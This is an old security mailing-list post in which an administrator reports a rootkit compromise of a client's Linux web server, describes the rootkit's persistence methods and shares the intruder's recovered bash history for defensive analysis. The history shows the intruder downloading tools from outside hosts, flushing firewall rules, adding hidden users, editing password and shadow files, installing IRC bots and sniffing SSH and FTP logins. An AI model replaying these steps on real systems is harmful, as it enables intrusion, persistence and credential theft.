Tuxkit (Optic Kit?) -cracked (/dev/tux)

From: Mark Newby (markat_private)
Date: Thu May 02 2002 - 03:54:25 PDT


    A client's web server (Red Hat Linux 7.2) was cracked into very recently.
    
    I have re-created a mini filesystem of all the files the
    rootkit/crackers modified or installed, on another system.  The main culprit
    was the directory /dev/tux: modified binaries were installed, password-less
    users were added, tools were downloaded, the network was sniffed, etc.
    
    One of the interesting things it does is install a rogue SSH2 server in
    /usr/bin/ssh2d that runs on a high-numbered port, and modify
    /etc/rc.d/init.d/network to start it whenever the network service comes
    up.  It also modifies /etc/rc.d/rc.sysinit to start /usr/bin/xsf and
    /usr/bin/xchk, which it installs.
    
    $ cat /dev/tux/ssh2/logo
    ________          __  .__          ____  __.__  __
    \_____  \ _______/  |_|__| ____   |    |/ _|__|/  |_
       /   |   \\____ \   __\  |/ ___\  |      < |  \   __\
    /    |    \  |_> >  | |  \  \___  |    |  \|  ||  |
    \_______  /   __/|__| |__|\___  > |____|__ \__||__|
              \/|__|                \/          \/
    
                   Only For Da T.R.U O.C's
    
    ---------- end of cat command output ----------
    
    ...anything to do with Mark Abene (aka `Phiber Optik'), I wonder?
    
    The files installed by the rootkit/crackers match a very detailed review
    of a rootkit called "Tuxkit" at the URL
    <http://www.hackinthebox.org/article.php?sid=5724>, also available at
    the URL <http://mel.ini2.net/p/tuxkit-analysis.txt> (which even advises
    on how the rootkit could be improved).
    
    At least one of the crackers who got in didn't know how to turn off the
    command history recording mechanism in bash, so I have a log of some of
    the commands issued during two of his logins (see the footer of this e-mail).
    
    This is my first post to this list.  Please advise if this e-mail
    could be improved upon.
    
    I've written to Nelson, an author of chkrootkit, to offer any data/files
    so that this rootkit can be added to its checks.  If anyone else would like
    any of the files, just ask.
    
    
    mark (the cracker's command history follows)
    
    ------------------------------------
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    lynx
    cd /var/www
    ls
    cd html
    ls
    cd /var/spool
    ls -la
    cd wu-ftpd-trojan
    ls
    make install
    make
    cd ..
    ls
    rm -rf wu-ftpd-trojan
    ls -la
    rm .wu.tar.gz
    ls
    cd samba
    mkdir .tmp
    cd .tmp
    ls -la
    wget ftp://ftp.eggheads.org/pub/eggdrop/source/1.6/eggdrop1.6.10.tar.gz
    ls -la
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    ls
    ipchains
    /sbin/ipchains
    /sbin/ipchains -L
    /sbin/iptables --help
    /sbin/iptables --L
    /sbin/iptables -L
    /sbin/iptables -F
    /sbin/ifconfig
    netstat -na
    cd /var/log
    ls -la
    cat xferlog
    cd /lib/security/.config
    ls
    ls -la
    cat .logs
    ./lpsched
    cd ssh
    ls
    cd ..
    dmesg |more
    cd /home
    ls
    cd amartin
    ls -la
    cd ..
    cd scripts
    ls -la
    cd ..
    tspreckley
    cd tspreckley
    ls
    cd ..
    mhill
    ls
    cd mhill
    ls -la
    cd ..
    ls -la
    cd mnewby
    ls -la
    cd ..
    ls -la
    cd nhoskins
    ls -la
    cd ..
    ls -la
    cd ..
    ls -la
    cd /root
    ls -la
    cat .saves-2169-www.kenmare.co.uk~
    cat rootat_private
    2
    ;:
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    ssh -p 15000 localhost
    /sbin/ifconfig
    ftp 62.98.168.235
    ls -la
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    ls -la
    /sbin/route
    /sbin/ifconfig
    host keeper-dmz.kenmare.co.uk
    nmap
    telnet 192.168.66.111 21
    
    route
    /sbin/route
    ping keeper-dmz.kenmare.co.uk
    host gw
    /sbin/route
    host dmz
    cat /etc/hosts
    ps aux
    kill -9 14576
    finger
    cd /home
    ls
    adduser tmp
    /bin/adduser
    /sbin/adduser
    /usr/sbin/adduser
    /usr/sbin/adduser tmp
    passwd tmp
    cat /etc/passwd
    ls
    exit
    export DISPLAY=c4zz1mb0cch10
    telnet locahost
    ls -la
    telnet localhost
    exit
    ls
    lynx www.google.it
    wget linux.minerva-is.cz/.tmp/.eg.tar.gz
    mv .eg.tar.gz /var/spool
    ls -la
    cd lib
    ls
    mkdir .tmp
    cd .tmp
    mv /var/spool/.eg.tar.gz .eg.tar.gz
    tar xvzf .eg.tar.gz
    cd eggdrop1.6.10
    cd ..
    rm -rf .eg.tar.gz
    rm -rf eggdrop1.6.10/
    wget http://www.eggdrops.de/download/eggdrop1.6.1+IPv6+precompiled.tar.gz
    tar xvzf eggdrop1.6.1+IPv6+precompiled.tar.gz
    eg *.tar.gz
    mv eggdrop1.6.1+IPv6_by_Akke/ .eg
    rm eggdrop1.6.1+IPv6+precompiled.tar.gz
    cd .eg
    ls
    rm eggdrop
    ls
    mv eggdrop-1.6.1 v0m3r0
    rm *.conf
    vi nnc
    ./v0m3r0 nnc -m
    telnet localhost 3333
    cd ..
    ls
    ls -la
    ps aux
    deluser tmp
    rmuser
    cd /home
    ls
    rm -rf tmp
    vi /etc/passwd
    vi /etc/passwd-
    vi /etc/shadow
    iptables -L
    /sbin/iptables -L
    exit
    ls -la
    cd /var/spool
    ls -la
    cd /lib
    ls -la
    cd .tmp
    ls -la
    cd .eg
    ls -la
    netstat -na
    
    
    exit
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    adduser cos
    /usr/bin/adduser
    /usr/sbin/adduser
    /usr/sbin/adduser cos
    passwd cos
    exit
    ifconfig
    /sbin/ifconfig
    cd /lib/security/.config
    ls -la
    find / -name tcp.log
    lynx
    ls
    wget
    ftp 62.98.245.54
    export DISPLAY=c4zz1mb0cch10
    telnet localhost
    lynx
    tar xvzf sniffit.0.3.5.tar.gz
    finger
    cd sniffit.0.3.5
    ls -la
    ./configure
    make
    ls -la
    cd ..
    mv sniffit.0.3.5 /var/spool/.tmp
    rm sniffit.0.3.5.tar.gz
    cd /var/spool/.tmp
    ls
    cd .tmp
    ls -la
    cd ..
    ls -la
    cd .tmp
    ls -la
    ./sniffit
    ./sniffit -P tcp -p 22
    /sbin/ifconfig
    ./sniffit -P tcp -p 22 -s 192.168.66.1
    ./sniffit -P tcp -p 22 -s 192.168.66.1  -L 10
    vi README.FIRST
    ./sniffit -P tcp -p 22,21 -s 192.168.66.1  -L 1 -F eth0
    ./sniffit -P tcp -p 22 -s 192.168.66.1  -L 1 -F eth0
    ./sniffit -P tcp -p 22 -s 192.168.66.1  -L 1
    ./sniffit -P tcp -p 22 -L 1 -s 192.168.66.1
    ./sniffit -P tcp -p 22 -s 192.168.66.1
    mv sniffit v0m3r0
    ls
    vi sample_config_file
    cd ..
    cd .tmp
    rm -rf *
    lynx
    gcc -o v0m3r0 linsniffer.c
    ls -la
    cd /home
    rm -rf cos
    exit
    -------------------------------------------
    
    
    
    


